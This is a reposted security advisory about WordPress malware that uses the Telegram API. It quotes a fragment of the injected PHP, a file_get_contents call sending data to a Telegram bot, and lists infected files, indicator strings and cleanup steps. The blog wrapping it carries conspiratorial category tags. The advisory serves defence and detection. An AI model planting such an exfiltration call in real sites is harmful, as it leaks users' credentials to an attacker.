WordPress malware using the Telegram API


“WordPress malware using the Telegram API”
“Panos Kesisis · 01st September 2020·Wordpress, PHP, Website Security”

Conspiracy Revelation: 28.9.2020: I removed the Telegram APIs manually from all infected files…

“wp_ajax_try_2020_v2”
“file_get_contents(“https://api.telegram.org/xxxxxxxx:AAE1-wpQyYquqvB7wOeBzzmPafEp0d81e6c/sendMessage?chat_id=1110165405&text=” . urlencode$”

“The malware looks to be infecting WordPress’ core files, “File Manager” and “WooCommerce” plugins for now, including the latest version of WordPress (5.5) and Woocommerce (4.4.1). The files that seem to be affected are:

wp-includes/user.php
wp-admin/admin-ajax.php
wp-file-manager/lib/files/HhGFXU.php (and other randomly named .php files)
woocommerce/includes/wc-user-functions.php
woocommerce/includes/class-wc-form-handler.php

Expressions that can help to determine if your site is compromised are:

“bajatax”
“api.telegram.org”

Since the code above is not hashed or obfuscated, it is extremely difficult to be scanned using a security plugin like wordfence or sucuri so manual intervention is advised.
Steps to resolve
Basic steps to resolve this is to replace all the wordpress core files with clean wp-admin and wp-includes folders and a fresh re-install of the woocommerce and wp file manager plugins. Always make sure to take a backup before attempting this.

Also, in no cases there should be any references of those strings anywhere in your website’s files or database (with the exception of when using the official Telegram plugin for the 2nd string).

Lastly, it is recommended to check on newly created WordPress usernames that might be injected into the database as well.

Source: https://fixed.net/blog/wordpress-malware-using-the-telegram-api

Dieser Beitrag wurde unter Allgemein, Alliance/Ermächtigung/Empower, Chaos & Karma, Corrupted Software/Microsoft etc., Counterdefense/Cyberterror-Morons, Detection, Implants, Intelligence/Surveillance/Sabotage, IT Security/IT Forensic, Kabbale/Cabal, Mafia&State Crime, News, Protection, Public Counterintelligence veröffentlicht. Setze ein Lesezeichen auf den Permalink.

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.